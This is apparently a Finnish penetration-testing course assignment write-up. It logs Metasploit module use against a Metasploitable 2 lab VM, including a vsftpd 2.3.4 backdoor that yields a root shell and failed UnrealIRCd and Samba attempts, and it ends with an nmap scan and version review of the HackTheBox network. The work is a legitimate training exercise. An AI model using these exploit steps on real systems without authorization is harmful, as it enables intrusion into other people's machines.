Tunkeutumistestaus ict4tn027-3006 – H5

z) Lue artikkelit ja katso videot, tee kustakin muistiinpanot (muutama ranskalainen viiva per artikkeli/video). Tässä z-kohdassa ei tarvitse tehdä mitään kokeita koneella.

  • Payload –> hyötykuorma, joka määrittelee tapahtumat joita haluamme suorittaa kohdekoneella.
  • Metasploitia suositaan muiden manuaalisten tekniikoiden sijasta, koska se on avointa lähdekoodia ja todella aktiivisesti kehittyvä alusta sekä säästää aikaa ja vaivaa tietokantojen sekä eri tekniikoiden vaihdossa.
  • Metasploit on myös hyvin tarkka kohdekoneilta poistuessa ja pysyvästä yhteydestä kohteeseen. Tunkeutumisesta ja sen hallinnoinnista tulee hyvin vaikeaa jos kohdepalvelin kaatuu kesken kaiken.

a) Metasploitable. Asenna Metasploitable 2. Murtaudu sille useilla tavoilla

  1. Ensimmäiseksi latasin Metasploitable 2 -virtuaalikoneen johon haluamme murtautua.
  2. Konetta luodessa virtuaaliboxissa, kovalevyksi piti asettaa juuri lataamamme paketin vmdk -tiedosto.
  1. Käynnistin koneen ja mfsadmin tunnuksilla pääsin sisään.
  2. Vaihdoin vielä metasploitable koneen asetuksista network välilehdeltä “host-only-network:iin”. Kaliin laitoin toisen verkkokortin NAT:in lisäksi eli tuon “host-only-networkin”.
  3. Pingillä testasin koneiden välistä yhteytttä ja kaikki toimii.
  1. Seuraavaksi itse murtautumiseen –> msfconsole avasin metasploitin.
  2. “database not connected”, tietokantaan pitää vissiin ottaa joka kerta uudestaan yhteys, joten peruutin hieman ja ajoin komennon “sudo msfdb init” ja takaisin konsoliin.
  3. Loin uuden työtilan –> workspace -a tehtava1 –> workspace tehtava1
  4. Ensimmäiseksi tiedustelin ja skannasin kohdekoneen –>
  5. db_nmap 192.168.56.102 -oA tuloksia -A
  1. No sieltähän löytyi vaikka mitä. “services” komennolla saamme hiukan nätimmän listan palvelimista ja porteista.
  1. Ensiksi halusin kokeilla murtautumista portin 21 “vsftpd 2.3.4” (very secure File Transfer Protocol Daemon) ohjelmiston kautta, koska juuri viimetunnilla näytettiin murtautuminen tämän palvelimen kautta.
  2. Etsin haavoittuvuuksia –> search vsftpd 2.3.4
  3. Löydettiin juuri tuo backdoor “takaovi” exploitti, otetaan se käyttöön komennolla –> use 3
  1. “info” ja “options” komennoilla tarkastelin hieman tarkemmin exploittia, sen tarkoitusta ja asetuksia jotka meidän pitää konfiguroida.
  1. RHOSTS (remote hosts) näyttää “current setting” kohdalla tyhjää, joten siihen meidän pitää määritellä kohdekoneen IP-osoite.
  2. Komennolla set RHOSTS 192.168.56.102 saamme kaikki “required” lokerot täytettyä.
  3. seuraavaksi ajetaan exploitti –> exploit
  4. Saimme shelli yhteyden kohdekoneeseen roottina (UID=0). Loin uuden hakemiston komennolla mkdir testi nähdäkseni, että pystyn luomaan tai lukemaan mitä vain tiedostoja järjestelmässä.
  1. sessions komennolla näämme “no active sessions” poistuin ihan ctrl + c:llä en ole ihan varma millä komennolla pystyisin poistumaan ja pitämään session yllä. Jokatapauksessa kirjoitin “back” ja ajattelin yrittää vielä toista tapaa murtautumiseen.
  2. Seuraavaksi hain inspiraatiota exploitability-guidesta ja halusin kokeilla tuota “UnrealIRCd” ohjelmaa takaovena.
  3. Eli etsin taas exploitteja portin 6667 ircciin komennolla –> search unrealIRCd
  4. Löydetään tällä kertaa vain yksi exploitti.
  1. Otetaan se käyttöön –> use 0
  2. info
  3. Sama “RHOSTS” laatikko vaatii konfigurointia
  4. asetan kohdekoneen IP-osoitteen –> set RHOSTS 192.168.56.102
  5. Tarkastan options komennolla, että kaikki on juuri niin kuin pitääkin eli myös portti numero.
  1. exploit
  2. Exploit completed, but no session was created.
  1. Mielenkiintoista kyseisen exploitti ei auta meitä pääsemään sisään. Kokeilin vielä resettaa ja kokeilla uudestaan, mutta sama lopputulos.
  2. Tämän jälkeen selailin aika pitkän aikaa kaikkia mahdollisuuksia ja lopulta päädyin sambaan.
  3. search samba
  4. Löysin 25 eri moduulia, totta puhuen monien “kuvaus” osio ei hirveesti auennut päässäni. Guide:n avulla päädyin exploit/multi/samba/usermap_script exploittiin (username map script command execution) jolla pitäisi päästä suorittamaan komentoja.
  1. use 13
  2. options
  3. Okei taas vain RHOSTS -lokero puuttuu
  4. set RHOSTS 192.168.56.102
  5. Exploit
  1. exploit completed, but no session was created. Okei taas sama probleema. You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want reverselistenerbindaddress? Tästä tuli mieleen että tuo Localhost address on nyt loopilla. Vaihdoin sen kali koneeni IP-osoitteesen. –> set LHOST 192.168.56.103
  2. exploit uudestaan –> naah sama probleema edelleen… Kokeilin vaihtaa vielä RPORT:in 139:stä 445:n ei vaikutusta.

b) Skannaa HackTheBoxin verkko niin, että tallennat tulokset Metasploitin tietokantoihin.

  1. Ensimmäisenä otin taas yhteyden HTB -verkkoon, tarkastin access -välilehdeltä yhteyden ja pingasin vielä “Academy” konetta yhteyden varmistamiseksi. –> ping 10.10.10.215
  2. Siirryin metasploitiin msfconsole ja varmistin että ollaan yhteydessä tietokantaan komennolla db_status.

3. Loin uuden hackthebox työtilan metasploitiin workspace -a hackthebox

4. workspace hackthebox

5. Sitten siirryin suoraan hacktheboxin verkon skannaamiseen –>

db_nmap -A 10.10.10.0-254

6. Skannaus kesti hieman pidempään (tottakai) verkko on laaja ja käytin “aggressive” skannaustekniikkaa. 9 minuuttia myöhemmin skannaus on valmis. Löysimme 22 hostia.

7. services komennolla saamme hieman helpompaan luettavaan muotoon kaikki palvelimet ja hosts komennolla taas voimme helposti tutkia verkon käyttöjärjestelmiä.

8.komennolla –> services -c name,port,info 10.10.10.197 voimme tarkastella vielä hieman tarkemmin ensimmäistä konetta.

9. Nyt pystymme siis kätevästi tutkimaan kaikkea tietoja, jonka skannasimme tietokantaan.

c) Onko joukossa vanhoja tai haavoittuvia versioita?

  1. Lähdin tutkimaan jokaista konetta vuorotellen tuolla services -c name,port,info (ip-osoite) -komennolla.
  1. Koneella 10.10.10.197 etsin –> search vsftpd 3.0.3 haavoittuvuuksia, löytyi tuo vsftpd backdoori (luotu versiolle 2.3.4) joten veikkaisin että kyseinen exploitti ei purisi.
  1. Koneen 10.10.10.203, löysin portin 80 Microsoft IIS htpd 10.0 searchilla saman exploitin kuin netistäkin (skripti jolla voit suorittaa sisältöä palvelimen hakemistoihin). Kyseinen exploitti on kuitenkin tullut ilmi jo vuonna 2004, joten epäilen jyrkästi sen toimimista.
  1. Koneessa 10.10.10.208 vsftpd 2.0.8 or later ehdotti taas tuota takaovea, tämäkin on hieman epävarma koska skannaus ei määritellyt satavarmaksi ohjelman versiota
  1. Tämän jälkeen en nyt löytänyt mitään mitä omilla osaamistaidoilla ainakaan voisi miettiä haavoittuvaiseksi kohteeksi. searchilla tottakai löytyi jokaisella haulla paljon eri exploitteja, mutta ei mitään varmaa millä voisimme saada esimerkiksi remote yhteyden.

Lähteet:

Metasploitable2, Luettu 6.12.2020:

https://sourceforge.net/projects/metasploitable/

https://docs.rapid7.com/metasploit/metasploitable-2-exploitability-guide/

https://www.hackers-arise.com/post/2017/01/25/metasploit-part-1-getting-started-with-metasploit

Tero Karvinen, Luettu 6.12.2020:

http://terokarvinen.com/2020/tunkeutumistestaus-kurssi-pentest-course-ict4tn027-3006-autumn-2020/#luettavaa-ja-linkkeja

Jaswal 2020: Mastering Metasploit – 4ed, Luettu 6.12.2020:

//learning.oreilly.com/library/view/mastering-metasploit-/9781838980078/B15076_01_Final_ASB_ePub.xhtml#_idParaDest-30

Leave a comment